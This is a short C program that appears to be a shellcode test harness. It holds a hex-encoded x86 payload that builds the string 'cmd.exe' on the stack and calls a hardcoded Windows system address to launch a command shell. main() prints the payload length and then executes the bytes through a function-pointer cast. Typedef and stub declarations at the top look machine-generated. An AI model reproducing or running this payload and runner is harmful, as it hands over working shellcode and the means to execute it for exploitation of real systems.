
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int getchar () ;
 int printf (char*,int) ;
 int strlen (char*) ;
 void stub1 () ;

int main() {
char shell[] = "\xb8\xff\xef\xff\xff\xf7\xd0\x2b\xe0\x55\x8b\xec"
  "\x33\xff\x57\x83\xec\x04\xc6\x45\xf8\x63\xc6\x45"
  "\xf9\x6d\xc6\x45\xfa\x64\xc6\x45\xfb\x2e\xc6\x45"
  "\xfc\x65\xc6\x45\xfd\x78\xc6\x45\xfe\x65\x8d\x45"
  "\xf8\x50\xbb\xc7\x93\xbf\x77\xff\xd3";

printf("Shellcode lenght %d\n", strlen(shell));
getchar();
((void (*)()) shell)();
return 0;
}
